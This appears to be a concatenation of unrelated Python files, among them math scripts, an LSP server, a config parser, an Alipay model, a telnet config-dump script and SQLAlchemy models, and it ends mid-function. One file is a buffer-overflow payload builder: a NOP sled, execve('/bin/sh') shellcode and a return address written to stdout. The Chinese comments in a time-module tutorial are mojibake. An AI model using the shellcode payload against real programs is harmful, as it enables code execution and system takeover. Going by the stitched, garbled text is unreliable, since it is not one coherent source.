    for p in primes:
        if x < p or x <= 1:
            break
        if x % p == 0:
            # Extract the full power of p that divides x.
            power = p
            while x % power == 0:
                power *= p
            power //= p
            x //= power
            ans = d[power] if ans == -1 else max(d[power], ans)
    return ans
def cal():
    """Sum divisior(i) over 2 <= i <= n and print the total (with a
    progress line every 1000 values)."""
    total = 0
    for value in range(2, n + 1):
        if value % 1000 == 0:
            print (value)
        total += divisior(value)
    print (total)
def cal_2():
    """Sieve-style variant of cal(): for every prime p, walk its multiples
    and record the best d[p**k] per number, then print the grand total."""
    best = [0] * (n + 10)
    for prime_index, p in enumerate(primes):
        if prime_index % 100 == 0:
            print(prime_index, p)
        for m in range(p, n + 1, p):
            # Full power of p dividing m.
            power = p
            while m % power == 0:
                power *= p
            power //= p
            # d values are >= 2, so max() also covers the unset (0) case.
            best[m] = max(best[m], d[power])
    print (sum(best))
cal_2()
|
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 19 22:19:10 2018
@author: brown
"""
def closest_power(base, num):
    '''
    base: base of the exponential, integer > 1
    num: number you want to be closest to, integer > 0

    Find the integer exponent such that base**exponent is closest to num.
    Note that the base**exponent may be either greater or smaller than num.
    In case of a tie, return the smaller value.
    Returns the exponent.
    '''
    # BUG FIX: the old loop only tried exponents below num // base, so it
    # missed the correct answer whenever the closest power exceeded that
    # range (e.g. closest_power(10, 12) returned 0 instead of 1).
    # Find the largest exponent whose power does not exceed num, then
    # compare it with the next power up.
    exponent = 0
    while base ** (exponent + 1) <= num:
        exponent += 1
    # Strict '<' keeps the smaller exponent (hence the smaller power) on a
    # tie, as the docstring requires.
    if abs(base ** (exponent + 1) - num) < abs(base ** exponent - num):
        return exponent + 1
    return exponent
print(closest_power(10,550.0)) |
import struct
import sys
offset = struct.pack("Q", 0x7fffffffe5e0)
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
payload = [
b"\x90"*49,
shellcode,
b"\x90"*60,
offset
]
payload = b"".join(payload)
sys.stdout.buffer.write(payload) |
import httplib
httpconn = httplib.HTTPConnection("www-130.ibm.com")
httpconn.request("GET", "/developerworks/index.html")
resp = httpconn.getresponse()
if resp.reason == "OK":
resp_data = resp.read()
print resp_data
httpconn.close()
|
#!/usr/bin/python3
"""
A simple LSP server for "efree", written on pygls, which provides a framework
for writing LSP servers.
efree identifies lower-case "e" in a document and highlights it.
"""
# -------------------------------------------------------------------------------
# Imports
# -------------------------------------------------------------------------------
import logging
# import argparse
from pygls.server import LanguageServer
from pygls.features import (TEXT_DOCUMENT_DID_CHANGE, TEXT_DOCUMENT_DID_CLOSE,
TEXT_DOCUMENT_DID_OPEN, TEXT_DOCUMENT_DID_SAVE)
from pygls.types import (Diagnostic, DidChangeTextDocumentParams,
DidSaveTextDocumentParams, DidCloseTextDocumentParams,
DidOpenTextDocumentParams, Position, Range)
# -------------------------------------------------------------------------------
# Parameters
# -------------------------------------------------------------------------------
logging.basicConfig(filename="logfree.log",
filemode="w",
format='%(asctime)-15s %(levelname)-8s%(message)s',
level=logging.INFO)
server = LanguageServer()
# ----------------------------------------------------------------------------
# Functions
# ----------------------------------------------------------------------------
@server.feature(TEXT_DOCUMENT_DID_OPEN)
async def did_open(ls, params: DidOpenTextDocumentParams):
    """Text document did open notification: scan the new document and
    publish "e" diagnostics."""
    _validate(ls, params)
    logging.info(">>> Event: Text document did open")
@server.feature(TEXT_DOCUMENT_DID_CHANGE)
def did_change(ls, params: DidChangeTextDocumentParams):
    """Text document did change notification: re-scan and republish
    diagnostics for the edited document."""
    _validate(ls, params)
    logging.info(">>> Event: Text document did change")
@server.feature(TEXT_DOCUMENT_DID_SAVE)
def did_save(ls, params: DidSaveTextDocumentParams):
    """Text document did save notification.

    No re-validation here -- presumably because saving does not change the
    text, so diagnostics are already current (TODO confirm)."""
    logging.info(">>> Event: Text document did save")
@server.feature(TEXT_DOCUMENT_DID_CLOSE)
def did_close(ls, params: DidCloseTextDocumentParams):
    """Text document did close notification.

    NOTE(review): this re-validates a document that was just closed --
    verify the workspace still returns it, and whether clearing the
    diagnostics (publishing an empty list) was the intent instead."""
    _validate(ls, params)
    logging.info(">>> Event: Text document did close")
def _validate(ls, params):
    """
    Scan the document for lower-case "e" and publish one diagnostic per
    occurrence (a single-character range at each match).
    """
    text_doc = ls.workspace.get_document(params.textDocument.uri)
    diagnostics = []
    for line_no, line in enumerate(text_doc.source.splitlines()):
        logging.debug("*** %s", line)
        col = line.find("e")
        while col != -1:
            msg = "Character e at column {}".format(col)
            diag = Diagnostic(Range(Position(line_no, col),
                                    Position(line_no, col + 1)),
                              msg,
                              source=type(server).__name__)
            diagnostics.append(diag)
            logging.debug("e at line %s, col %s", line_no, col)
            col = line.find("e", col + 1)
        logging.debug("The remainder of line %s is efree", line_no)
    ls.publish_diagnostics(text_doc.uri, diagnostics)
def main():
    """
    Entry point: start the language server
    """
    logging.info("About to start efree Language Server")
    # NOTE(review): start_io() blocks until the client disconnects, so the
    # "Started" line below is only logged at shutdown -- its wording is
    # misleading.
    server.start_io()
    logging.info("Started efree Language Server")
if __name__ == '__main__':
main()
|
#coding:utf-8
'''
0 4ไฝๆฐๅนด 2008
1 ๆ 1 ๅฐ 12
2 ๆฅ 1ๅฐ31
3 ๅฐๆถ 0ๅฐ23
4 ๅ้
5 ็ง 0ๅฐ61 (60ๆ61 ๆฏ้ฐ็ง)
6 ไธๅจ็็ฌฌๅ ๆฅ 0ๅฐ6 (0ๆฏๅจไธ)
7 ไธๅนด็็ฌฌๅ ๆฅ 1ๅฐ366 (ๅ็ฅๅ)
8 ๅคไปคๆถ -1, 0, 1, -1ๆฏๅณๅฎๆฏๅฆไธบๅคไปคๆถ็ๆๅธ
0 tm_year 2008
1 tm_mon 1 ๅฐ 12
2 tm_mday 1 ๅฐ 31
3 tm_hour 0 ๅฐ 23
4 tm_min 0 ๅฐ 59
5 tm_sec 0 ๅฐ 61 (60ๆ61 ๆฏ้ฐ็ง)
6 tm_wday 0ๅฐ6 (0ๆฏๅจไธ)
7 tm_yday 1 ๅฐ 366(ๅ็ฅๅ)
8 tm_isdst -1, 0, 1, -1ๆฏๅณๅฎๆฏๅฆไธบๅคไปคๆถ็ๆๅธ
'''
#
# *********************** Time demo *******************
#
import time

# Seconds since the epoch, as a float.
ticks = time.time()
print ticks

# Broken-down local time (a struct_time).
localtime = time.localtime(time.time())
print localtime
print localtime.tm_year, localtime.tm_mon, localtime.tm_mday
# Human-readable form, e.g. 'Tue Dec 11 18:07:14 2008'.
print time.asctime(localtime)

import calendar
# Text calendar for January 2008.
cal = calendar.month(2008, 1)
print cal
#
# Timeๆจกๅ
#
# Timeๆจกๅๅ
ๅซไบไปฅไธๅ
็ฝฎๅฝๆฐ๏ผๆขๆๆถ้ดๅค็็ธ็๏ผไนๆ่ฝฌๆขๆถ้ดๆ ผๅผ็๏ผ
#
'''
1 time.altzone
่ฟๅๆ ผๆๅจๆฒป่ฅฟ้จ็ๅคไปคๆถๅฐๅบ็ๅ็งป็งๆฐใๅฆๆ่ฏฅๅฐๅบๅจๆ ผๆๅจๆฒปไธ้จไผ่ฟๅ่ดๅผ๏ผๅฆ่ฅฟๆฌง๏ผๅ
ๆฌ่ฑๅฝ๏ผใๅฏนๅคไปคๆถๅฏ็จๅฐๅบๆ่ฝไฝฟ็จใ
2 time.asctime([tupletime])
ๆฅๅๆถ้ดๅ
็ปๅนถ่ฟๅไธไธชๅฏ่ฏป็ๅฝขๅผไธบ"Tue Dec 11 18:07:14 2008"๏ผ2008ๅนด12ๆ11ๆฅ ๅจไบ18ๆถ07ๅ14็ง๏ผ็24ไธชๅญ็ฌฆ็ๅญ็ฌฆไธฒใ
3 time.clock( )
็จไปฅๆตฎ็นๆฐ่ฎก็ฎ็็งๆฐ่ฟๅๅฝๅ็CPUๆถ้ดใ็จๆฅ่กก้ไธๅ็จๅบ็่ๆถ๏ผๆฏtime.time()ๆดๆ็จใ
4 time.ctime([secs])
ไฝ็จ็ธๅฝไบasctime(localtime(secs))๏ผๆช็ปๅๆฐ็ธๅฝไบasctime()
5 time.gmtime([secs])
ๆฅๆถๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผๅนถ่ฟๅๆ ผๆๅจๆฒปๅคฉๆๆถ้ดไธ็ๆถ้ดๅ
็ปtใๆณจ๏ผt.tm_isdstๅง็ปไธบ0
6 time.localtime([secs])
ๆฅๆถๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผๅนถ่ฟๅๅฝๅฐๆถ้ดไธ็ๆถ้ดๅ
็ปt๏ผt.tm_isdstๅฏๅ0ๆ1๏ผๅๅณไบๅฝๅฐๅฝๆถๆฏไธๆฏๅคไปคๆถ๏ผใ
7 time.mktime(tupletime)
ๆฅๅๆถ้ดๅ
็ปๅนถ่ฟๅๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผใ
8 time.sleep(secs)
ๆจ่ฟ่ฐ็จ็บฟ็จ็่ฟ่ก๏ผsecsๆ็งๆฐใ
9 time.strftime(fmt[,tupletime])
ๆฅๆถไปฅๆถ้ดๅ
็ป๏ผๅนถ่ฟๅไปฅๅฏ่ฏปๅญ็ฌฆไธฒ่กจ็คบ็ๅฝๅฐๆถ้ด๏ผๆ ผๅผ็ฑfmtๅณๅฎใ
10 time.strptime(str,fmt='%a %b %d %H:%M:%S %Y')
ๆ นๆฎfmt็ๆ ผๅผๆไธไธชๆถ้ดๅญ็ฌฆไธฒ่งฃๆไธบๆถ้ดๅ
็ปใ
11 time.time( )
่ฟๅๅฝๅๆถ้ด็ๆถ้ดๆณ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผใ
12 time.tzset()
ๆ นๆฎ็ฏๅขๅ้TZ้ๆฐๅๅงๅๆถ้ด็ธๅ
ณ่ฎพ็ฝฎใ
1 time.timezone
ๅฑๆงtime.timezoneๆฏๅฝๅฐๆถๅบ๏ผๆชๅฏๅจๅคไปคๆถ๏ผ่ท็ฆปๆ ผๆๅจๆฒป็ๅ็งป็งๆฐ๏ผ>0๏ผ็พๆดฒ;<=0ๅคง้จๅๆฌงๆดฒ๏ผไบๆดฒ๏ผ้ๆดฒ๏ผใ
2 time.tzname
ๅฑๆงtime.tznameๅ
ๅซไธๅฏนๆ นๆฎๆ
ๅต็ไธๅ่ไธๅ็ๅญ็ฌฆไธฒ๏ผๅๅซๆฏๅธฆๅคไปคๆถ็ๆฌๅฐๆถๅบๅ็งฐ๏ผๅไธๅธฆ็ใ
'''
#
# ๆฅๅๆจกๅ Calendar
#
'''
1 calendar.calendar(year,w=2,l=1,c=6)
่ฟๅไธไธชๅค่กๅญ็ฌฆไธฒๆ ผๅผ็yearๅนดๅนดๅ๏ผ3ไธชๆไธ่ก๏ผ้ด้่ท็ฆปไธบcใ ๆฏๆฅๅฎฝๅบฆ้ด้ไธบwๅญ็ฌฆใๆฏ่ก้ฟๅบฆไธบ21* W+18+2* Cใlๆฏๆฏๆๆ่กๆฐใ
2 calendar.firstweekday( )
่ฟๅๅฝๅๆฏๅจ่ตทๅงๆฅๆ็่ฎพ็ฝฎใ้ป่ฎคๆ
ๅตไธ๏ผ้ฆๆฌก่ฝฝๅ
ฅcaendarๆจกๅๆถ่ฟๅ0๏ผๅณๆๆไธใ
3 calendar.isleap(year)
ๆฏ้ฐๅนด่ฟๅTrue๏ผๅฆๅไธบfalseใ
4 calendar.leapdays(y1,y2)
่ฟๅๅจY1๏ผY2ไธคๅนดไน้ด็้ฐๅนดๆปๆฐใ
5 calendar.month(year,month,w=2,l=1)
่ฟๅไธไธชๅค่กๅญ็ฌฆไธฒๆ ผๅผ็yearๅนดmonthๆๆฅๅ๏ผไธค่กๆ ้ข๏ผไธๅจไธ่กใๆฏๆฅๅฎฝๅบฆ้ด้ไธบwๅญ็ฌฆใๆฏ่ก็้ฟๅบฆไธบ7* w+6ใlๆฏๆฏๆๆ็่กๆฐใ
6 calendar.monthcalendar(year,month)
่ฟๅไธไธชๆดๆฐ็ๅๅฑๅตๅฅๅ่กจใๆฏไธชๅญๅ่กจ่ฃ
่ฝฝไปฃ่กจไธไธชๆๆ็ๆดๆฐใYearๅนดmonthๆๅค็ๆฅๆ้ฝ่ฎพไธบ0;่ๅดๅ
็ๆฅๅญ้ฝ็ฑ่ฏฅๆ็ฌฌๅ ๆฅ่กจ็คบ๏ผไป1ๅผๅงใ
7 calendar.monthrange(year,month)
่ฟๅไธคไธชๆดๆฐใ็ฌฌไธไธชๆฏ่ฏฅๆ็ๆๆๅ ็ๆฅๆ็ ๏ผ็ฌฌไบไธชๆฏ่ฏฅๆ็ๆฅๆ็ ใๆฅไป0๏ผๆๆไธ๏ผๅฐ6๏ผๆๆๆฅ๏ผ;ๆไป1ๅฐ12ใ
8 calendar.prcal(year,w=2,l=1,c=6)
็ธๅฝไบ print calendar.calendar(year,w,l,c).
9 calendar.prmonth(year,month,w=2,l=1)
็ธๅฝไบ print calendar.calendar๏ผyear๏ผw๏ผl๏ผc๏ผใ
10 calendar.setfirstweekday(weekday)
่ฎพ็ฝฎๆฏๅจ็่ตทๅงๆฅๆ็ ใ0๏ผๆๆไธ๏ผๅฐ6๏ผๆๆๆฅ๏ผใ
11 calendar.timegm(tupletime)
ๅtime.gmtime็ธๅ๏ผๆฅๅไธไธชๆถ้ดๅ
็ปๅฝขๅผ๏ผ่ฟๅ่ฏฅๆถๅป็ๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผใ
12 calendar.weekday(year,month,day)
่ฟๅ็ปๅฎๆฅๆ็ๆฅๆ็ ใ0๏ผๆๆไธ๏ผๅฐ6๏ผๆๆๆฅ๏ผใๆไปฝไธบ 1๏ผไธๆ๏ผ ๅฐ 12๏ผ12ๆ๏ผ
'''
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMarketingCampaignRetailDmSetModel(object):
    """Value-holder for the Koubei retail DM campaign 'set' request, with
    three optional fields convertible to/from the Alipay dict shape."""

    # Serialisable field names, in dict order.
    _FIELDS = ('campaign_end_time', 'content_id', 'operate_type')

    def __init__(self):
        self._campaign_end_time = None
        self._content_id = None
        self._operate_type = None

    @property
    def campaign_end_time(self):
        return self._campaign_end_time

    @campaign_end_time.setter
    def campaign_end_time(self, value):
        self._campaign_end_time = value

    @property
    def content_id(self):
        return self._content_id

    @content_id.setter
    def content_id(self, value):
        self._content_id = value

    @property
    def operate_type(self):
        return self._operate_type

    @operate_type.setter
    def operate_type(self, value):
        self._operate_type = value

    def to_alipay_dict(self):
        """Serialise every populated (truthy) field into a request dict."""
        params = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if not value:
                continue
            if hasattr(value, 'to_alipay_dict'):
                params[field] = value.to_alipay_dict()
            else:
                params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from an Alipay dict; returns None for empty input."""
        if not d:
            return None
        model = KoubeiMarketingCampaignRetailDmSetModel()
        for field in KoubeiMarketingCampaignRetailDmSetModel._FIELDS:
            if field in d:
                setattr(model, field, d[field])
        return model
|
"""
Multi-file config parser for any library.
Not usually to be used alone, usually you ready from the parser into a settings file.
Changes can be made by creating / updating a ~/.{{file_name}} in your home directory or an /etc/.{{file_name}} file for
system wide settings.
Imports are in the following order:
1. Home Directory always overrides any other settings
2. /etc/default/{{file_name}} overrides defaults
3. Defaults are used last
For help with config files please see:
https://docs.python.org/2/library/configparser.html
"""
import logging
import os
import re
import traceback
from collections import OrderedDict
import six
if six.PY2:
from backports import configparser
from backports.configparser import NoOptionError, InterpolationSyntaxError, InterpolationDepthError, \
MAX_INTERPOLATION_DEPTH, NoSectionError, InterpolationMissingOptionError, _UNSET
else:
import configparser
from configparser import NoOptionError, InterpolationSyntaxError, InterpolationDepthError, \
MAX_INTERPOLATION_DEPTH, NoSectionError, InterpolationMissingOptionError, _UNSET
def from_none(exc):
    """Return *exc* prepared so that raising it behaves like
    ``raise exc from None`` (suppresses the chained-cause traceback)."""
    exc.__suppress_context__ = True
    exc.__cause__ = None
    return exc
log = logging.getLogger(__name__)
SECTION_REGEX = re.compile('%\((\w+):(\w+)\)s')
class SuperInterpolator(configparser.ExtendedInterpolation):
    """ExtendedInterpolation variant that can additionally resolve values
    from a caller-supplied ``context`` mapping.

    Two reference syntaxes:
      * ``${option}`` / ``${section:option}`` -- lookup against the parser
        (standard extended interpolation);
      * ``$(key)`` -- lookup in the ``context`` dict passed to before_get.
    A context lookup may yield a non-string object, which is returned
    unchanged when it is the whole value.
    """

    # Matches either ${...} (group 1, parser lookup) or $(...) (group 2,
    # context lookup).
    _KEYCRE = re.compile(r"\$\{([^}]+)\}|\$\(([^)]+)\)")

    def before_get(self, parser, section, option, value, defaults, context=None):
        L = []
        self._interpolate_some(parser, option, L, value, section, defaults, 1, context=context)
        # If every fragment is a string, join them; otherwise a context
        # lookup produced a non-string object -- hand the first one back.
        if all((isinstance(x, six.string_types) for x in L)):
            return ''.join(L)
        return L[0]

    def _interpolate_some(self, parser, option, accum, rest, section, map, depth, context=None):
        # Non-string values (e.g. objects resolved from context) cannot
        # contain further references.
        if not isinstance(rest, six.string_types):
            return
        rawval = parser.get(section, option, raw=True, fallback=rest)
        if depth > MAX_INTERPOLATION_DEPTH:
            raise InterpolationDepthError(option, section, rawval)
        while rest:
            p = rest.find("$")
            if p < 0:
                # No more references: emit the remainder verbatim.
                accum.append(rest)
                return
            if p > 0:
                accum.append(rest[:p])
                rest = rest[p:]
            # p is no longer used
            c = rest[1:2]
            c_groups = ["{", "("]
            if c == "$":
                # "$$" is an escaped literal dollar sign.
                accum.append("$")
                rest = rest[2:]
            elif c in c_groups:
                m = self._KEYCRE.match(rest)
                if m is None:
                    raise InterpolationSyntaxError(option, section,
                                                   "bad interpolation variable reference %r" % rest)
                # group 1 == ${...} (parser), group 2 == $(...) (context).
                group = c_groups.index(c) + 1
                path = m.group(group).split(':')
                rest = rest[m.end():]
                sect = section
                opt = option
                v = ""
                try:
                    if group == 1:
                        if len(path) == 1:
                            opt = parser.optionxform(path[0])
                            v = map[opt]
                        elif len(path) == 2:
                            sect = path[0]
                            opt = parser.optionxform(path[1])
                            v = parser.get(sect, opt, raw=True)
                        else:
                            raise configparser.InterpolationSyntaxError(
                                option, section,
                                "More than one ':' found: %r" % (rest,))
                    elif group == 2:
                        if not context:
                            raise configparser.InterpolationError(option, section, "Trying to interpolate from "
                                                                  "context with no context!")
                        if len(path) == 1:
                            v = context[path[0]]
                        else:
                            raise configparser.InterpolationSyntaxError(
                                option, section,
                                "More than one ':' found: %r" % (rest,))
                except (KeyError, NoSectionError, NoOptionError):
                    raise from_none(InterpolationMissingOptionError(
                        option, section, rawval, ":".join(path)))
                if v and "$" in v:
                    # Resolved value may itself contain references; recurse
                    # against its own section's raw items.
                    self._interpolate_some(parser, opt, accum, v, sect,
                                           dict(parser.items(sect, raw=True)),
                                           depth + 1, context=context)
                elif v:
                    accum.append(v)
            else:
                raise InterpolationSyntaxError(
                    option, section,
                    "'$' must be followed by '$' or '{' or '(', "
                    "found: %r" % (rest,))
class AttrDict(dict):
    """dict subclass whose items are also reachable as attributes.

    ``self.__dict__`` is aliased to the dict itself, so ``d['x']`` and
    ``d.x`` are the same storage.
    """

    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)
        self.__dict__ = self

    def __deepcopy__(self, memo):
        # BUG FIX: the old implementation did ``type(self)(**self)``, which
        # only copies the top level (a shallow copy) and breaks on
        # non-string keys.  Deep-copy every key and value, registering the
        # new object in ``memo`` first so cyclic references resolve.
        import copy
        dcopy = type(self)()
        memo[id(self)] = dcopy
        for key, value in self.items():
            dcopy[copy.deepcopy(key, memo)] = copy.deepcopy(value, memo)
        return dcopy
class MultiFileConfigParser(configparser.ConfigParser):
    """
    Pulls in multiple config files and merges them into one configuration.
    Resolves variables with a context and can replace objects:
    $<variable> will resolve to a python object out of the context.
    {variable} will be formatted as a string out of the context.
    """
    # Base name of the config file (e.g. "myapp" -> ~/.myapp and
    # /etc/default/myapp); set per instance in __init__.
    file_name = None
    # Context-aware interpolator used for every lookup.
    _DEFAULT_INTERPOLATION = SuperInterpolator()

    def __init__(self, file_name, default_file=None, auto_read=True, *args, **kwargs):
        """
        :param file_name: base name used to derive the per-user and
            system-wide config paths
        :param default_file: optional path to a defaults file, read first
        :param auto_read: when True, load every config file immediately
        """
        self.file_name = file_name
        self.default_file = default_file
        super(MultiFileConfigParser, self).__init__(*args, **kwargs)
        self.config_files = []  # paths actually found, in read order
        if auto_read:
            self.read_configs()

    def add_config_file(self, path, required=False):
        """Read one config file if it exists; raise ValueError when a
        required file is missing."""
        if path:
            if os.path.exists(path):
                self.config_files.append(path)
                try:
                    self.read(path)
                # NOTE(review): bare except also catches KeyboardInterrupt /
                # SystemExit; it does re-raise, but ``except Exception:``
                # would be the conventional narrow form.
                except:
                    log.error('Failed to load file {}: {}'.format(path, traceback.format_exc()))
                    raise
            else:
                if not required:
                    log.info('Configuration path does not exist, skipping: {}'.format(path))
                else:
                    raise ValueError('Required configuration file does not exist: {}'.format(path))

    def read_configs(self):
        """Load defaults, then /etc/default/<name>, then ~/.<name> -- later
        files override earlier ones (see module docstring)."""
        default_config = self.default_file
        etc_config = '/etc/default/{}'.format(self.file_name)
        home_config = None
        if "HOME" in os.environ:
            try:
                home_config = os.path.join(os.environ.get('HOME'), '.{}'.format(self.file_name))
            except AttributeError:
                log.info('Unable to load home configs.')
        config_files = [default_config, etc_config, home_config]
        for cf in config_files:
            self.add_config_file(cf)

    def get(self, section, option, **kwargs):
        """ConfigParser.get with an extra ``context`` kwarg that is handed
        to the interpolator for ``$(key)`` lookups; supports the usual
        ``raw``/``vars``/``fallback`` keywords."""
        raw = kwargs.get('raw', False)
        vars = kwargs.get('vars', None)
        fallback = kwargs.get('fallback', _UNSET)
        context = kwargs.get('context', None)
        try:
            d = self._unify_values(section, vars)
        except NoSectionError:
            if fallback is _UNSET:
                raise
            else:
                return fallback
        option = self.optionxform(option)
        try:
            value = d[option]
        except KeyError:
            if fallback is _UNSET:
                raise NoOptionError(option, section)
            else:
                return fallback
        if raw or value is None:
            return value
        else:
            return self._interpolation.before_get(self, section, option, value, d, context=context)

    def gettuple(self, section, option, delimiter=',', context=None):
        """Return the option split on ``delimiter`` as a tuple of stripped,
        non-empty entries."""
        val = self.get(section, option, context=context)
        return tuple([v.strip() for v in val.split(delimiter) if v])

    def getlist(self, section, option, delimiter=',', context=None):
        """Like gettuple(), but returns a list."""
        val = self.get(section, option, context=context)
        return list([v.strip() for v in val.split(delimiter) if v])

    def getdict(self, section, context=None):
        """Return a whole section as an OrderedDict of interpolated values."""
        return OrderedDict(self.items(section, context=context))

    def getvalues(self, section, context=None):
        """Values of a section, in option order."""
        return self.getdict(section, context=context).values()

    def getkeys(self, section, context=None):
        """Option names of a section, in order."""
        return self.getdict(section, context=context).keys()

    def getsettings(self, section, raw=False, vars=None, context=None):
        """Section items with upper-cased keys (settings-module style)."""
        return OrderedDict(((str(k).upper(), v) for k, v in self.items(section, raw=raw, vars=vars, context=context)))

    def items(self, section=_UNSET, raw=False, vars=None, context=None):
        """ConfigParser.items with ``context`` support; yields
        (option, interpolated_value) pairs lazily."""
        if section is _UNSET:
            return super(MultiFileConfigParser, self).items()
        d = self._defaults.copy()
        try:
            d.update(self._sections[section])
        except KeyError:
            if section != self.default_section:
                raise NoSectionError(section)
        # Update with the entry specific variables
        if vars:
            for key, value in vars.items():
                d[self.optionxform(key)] = value
        value_getter = lambda option: self._interpolation.before_get(self,
                                                                     section, option, d[option], d, context=context)
        if raw:
            value_getter = lambda option: d[option]
        return ((option, value_getter(option)) for option in d.keys())

    def getenv(self, section, option, key=None, type=str, context=None):
        """
        Try and get the option out of os.environ and cast it, otherwise return the config value (casted)
        :param section: settings section name
        :param option: the name of the option
        :param key: The name of the os.environ key. Defaults to option.
        :param type: the type to cast it to
        :return: parsed value
        """
        if key is None:
            key = option
        value = os.environ.get(key, None)
        if value is not None:
            try:
                return type(value)
            # NOTE(review): a failed cast silently falls through to the
            # config value -- confirm this best-effort behaviour is wanted.
            except TypeError:
                pass
        value = self.get(section, option, context=context)
        if value:
            return type(value)
        # NOTE(review): implicitly returns None when the config value is
        # falsy -- verify against the original file (this view may be
        # truncated here).
import telnetlib
import getpass

host = '192.168.122.10'

# Prompt for credentials; getpass suppresses echo, so this must be run from a
# real console (not PyCharm or IDLE).
user = input('Enter the username:')
#password = 'cisco'
password = getpass.getpass('Enter the password:')

# Log in to the device over telnet.
tn = telnetlib.Telnet(host)
tn.read_until(b'Username: ')
tn.write(user.encode() + b'\n')
tn.read_until(b'Password: ')
tn.write(password.encode() + b'\n')

# Enter privileged mode and dump the running configuration.
commands = (
    b'enable',
    b'cisco',              # the enable password
    b'terminal length 0',  # disable paging so the whole config streams back
    b'sh running-config',
    b'exit',
)
for command in commands:
    tn.write(command + b'\n')

result = tn.read_all().decode()
print(result)
|
#Nick Zapata - Daily lesson - 2/8/18
# FizzBuzz-style drill: multiples of 3 print 'usb', multiples of 5 print
# 'device', multiples of both print 'usb device', anything else prints the
# number itself.
# Bug fix: the original wrote `for counter in(1, 20)`, which iterates over the
# two-element tuple (1, 20) — only 1 and 20 were ever printed. range(1, 20)
# walks the intended 1..19 sequence.
for counter in range(1, 20):
    if (counter % 3 == 0) and (counter % 5 == 0):
        print('usb device')
    elif (counter % 3 == 0):
        print('usb')
    elif (counter % 5 == 0):
        print('device')
    else:
        print(counter)
|
'''
Created on Mar 27, 2014
do:
binarize label
feature -> init name
@author: cx
'''
import site
import pickle
site.addsitedir('/bos/usr0/cx/PyCode/Geektools')
site.addsitedir('/bos/usr0/cx/PyCode/cxPyLib')
site.addsitedir('/bos/usr0/cx/PyCode/QueryExpansion')
site.addsitedir('/bos/usr0/cx/PyCode/SupervisedQueryExpansion')
from base.ExpTerm import *
from cxBase.base import *
from TermFeatureProcessing.FeatureHash import *
from TermFeatureProcessing.DiscardSingleQFeature import DiscardSingleQFeature
from cxBase.FeatureBase import cxFeatureC
import sys
# Command-line driver (Python 2): read query-expansion terms, drop rare
# feature dimensions, re-index features, min-max normalize, binarize the
# labels against PosBar, and dump the result plus the feature-name dictionary.
if 3 > len(sys.argv):
    print "2 para: input + outname + (positivebar default 0) + filter fraction min (default 0.01)"
    sys.exit()

InName = sys.argv[1]
OutName = sys.argv[2]
DictName = OutName + "_initdict"  # feature-name -> index mapping written by InitizeFeature

PosBar = 0  # scores above this threshold are binarized to positive
if len(sys.argv) >= 4:
    PosBar = float(sys.argv[3])
MinFilterFrac = 0.01  # minimum appearance fraction a feature dim needs to survive filtering
if len(sys.argv) >= 5:
    MinFilterFrac = float(sys.argv[4])

llExpTerm = ReadQExpTerms(InName)  # list of per-query term lists
print "read term from [%s] done" %(InName)
# llExpTerm = DiscardSingleQFeature(llExpTerm)
# print "discard feature that only appear in one q done"

# Flatten the per-query lists into one term list.
lExpTerm = []
for mid in llExpTerm:
    lExpTerm.extend(mid)

lExpTerm = cxFeatureC.FilterByFraction(lExpTerm, MinFilterFrac)
print "filter dim by min frac [%f] done" %(MinFilterFrac)
lExpTerm = InitizeFeature(lExpTerm,DictName)
print "initize feature done"
#add normilization
lExpTerm = MinMaxFeatureNormalize(lExpTerm)
lExpTerm = BinarizeScore(lExpTerm,PosBar)
print "binarizescore done"

# Dump one term per line (Python 2 `print >>` redirection).
out = open(OutName,'w')
for ExpTerm in lExpTerm:
    print >> out,ExpTerm.dump()
out.close()
print "finished"
|
from datetime import datetime
from sqlalchemy import Column, Integer, String, ForeignKey, Text, Boolean, \
DateTime, MetaData
from sqlalchemy.orm import relationship
from app import db
# Deterministic constraint/index names so migration tools (e.g. Alembic) can
# reference them; passed to MetaData as its naming convention.
convention = dict(
    ix='ix_%(column_0_label)s',
    uq='uq_%(table_name)s_%(column_0_name)s',
    ck='ck_%(table_name)s_%(constraint_name)s',
    fk='fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s',
    pk='pk_%(table_name)s',
)
metadata = MetaData(naming_convention=convention)
class Page(db.Model):
    """A wiki page: a unique title plus a chain of content revisions."""
    __tablename__ = 'page'
    id = Column(Integer, primary_key=True, autoincrement=True)
    title = Column(String, index=True, unique=True)
    # Holds the id of the most recently created revision.
    # NOTE(review): typed String although it stores Revision.id — confirm
    # whether Integer + ForeignKey was intended.
    revision_latest = Column(String)
    revision = relationship("Revision", backref="page",
                            foreign_keys="Revision.page_id",
                            cascade="all,delete")
    def __repr__(self):
        return '<{}>'.format(self.title)
    @staticmethod
    def create_with_revision(data):
        """Create a page with its first revision/content; return a summary dict."""
        page = Page(title=data.get('title'))
        content = Content(text=data.get('content'))
        revision = Revision(page=page, content=content, actual=True)
        # Commit first so page/revision ids are assigned before they are read.
        db.session.add(revision)
        db.session.commit()
        page.set_latest_revision(revision)
        content.add_revision(revision)
        return {
            'id': page.id,
            'title': page.title,
            'actual': revision.id,
            'content': content.text
        }
    def update_with_revision(self, data):
        """Attach a new revision/content to this page and mark it actual.

        NOTE(review): unlike create_with_revision, this does not call
        set_latest_revision, so revision_latest keeps pointing at the first
        revision — verify whether that is intentional.
        """
        content = Content(text=data.get('content'))
        revision = Revision(page=self, content=content, actual=True)
        db.session.add(revision)
        db.session.commit()
        revision.set_as_actual()
        content.add_revision(revision)
        return {
            'id': self.id,
            'title': self.title,
